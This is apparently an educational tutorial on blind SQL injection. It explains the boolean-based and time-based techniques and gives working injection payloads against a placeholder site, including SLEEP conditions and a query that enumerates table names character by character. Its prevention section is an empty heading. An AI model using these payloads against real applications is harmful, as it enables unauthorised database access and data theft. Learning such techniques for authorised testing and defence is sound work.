🧠 Blind SQL Injection (Blind SQLi)

Exploiting the database... even when errors are hidden

🕵️ What is Blind SQL Injection?

Blind SQL Injection is a type of SQL injection where the application does not display database errors or query results directly in the response. Instead, attackers must infer the result of queries based on indirect clues like response time, status codes, or behavioral changes.

🧬 Types of Blind SQLi

1. Boolean-Based (Content-Based)

The application behaves differently depending on whether the injected condition is true or false. 

GET /product?id=5 AND 1=1 --> returns full page
GET /product?id=5 AND 1=2 --> returns blank or error page

2. Time-Based

Uses SQL functions like SLEEP() or pg_sleep() to measure delays in the response, inferring true/false based on response time. 

GET /product?id=5 AND SLEEP(5) --> page delays 5 seconds (true)
GET /product?id=5 AND SLEEP(0) --> no delay (false)

🛠️ Exploiting Blind SQLi: Step-by-Step

Step 1: Identify injection point

Use a test payload like ' AND 1=1-- or ' AND SLEEP(5)-- in parameters such as URLs, forms, or headers.

Step 2: Confirm behavior change

Compare response patterns (HTML content, length, response time) for true vs. false conditions.

Step 3: Extract information bit by bit

Use binary inference to guess characters. For example: 

GET /product?id=1 AND (SELECT SUBSTRING(database(),1,1))='m'

Check if the page behavior changes when the guess is correct. Automate this with tools like SQLMap.

🌐 Real-World Example

Assume the following vulnerable endpoint:

https://vuln.site/item.php?id=2

Time-based test:

https://vuln.site/item.php?id=2' AND SLEEP(5)--+

If response is delayed, the input is injectable. We can now enumerate users or schema names:

' AND (SELECT CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u') THEN SLEEP(5) ELSE 0 END)--+

🔧 Tools to Automate Blind SQLi

💡 Pro Tips

🛡️ How to Prevent Blind SQLi

📚 Further Reading